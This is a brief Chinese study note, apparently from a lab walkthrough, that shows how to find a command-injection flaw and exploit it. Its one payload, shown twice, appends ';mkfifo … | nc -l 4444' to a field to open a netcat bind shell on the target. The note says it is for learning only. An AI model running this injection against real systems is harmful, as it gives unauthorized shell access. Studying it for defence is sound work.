!!!笔记仅供学习交流使用,请勿进行其他用途!!!
CONTENTS
检测漏洞:
首先输入正常的命令:
然后试下其他的命令,看下是不是有问题:
命令注入:
发现可注入后,就可以尝试使用nc命令了:
;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
然后我们启动terminal,发现已经连接上了。
好记性不如铅笔头
!!!笔记仅供学习交流使用,请勿进行其他用途!!!
CONTENTS
首先输入正常的命令:
然后试下其他的命令,看下是不是有问题:
发现可注入后,就可以尝试使用nc命令了:
;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
然后我们启动terminal,发现已经连接上了。
发表评论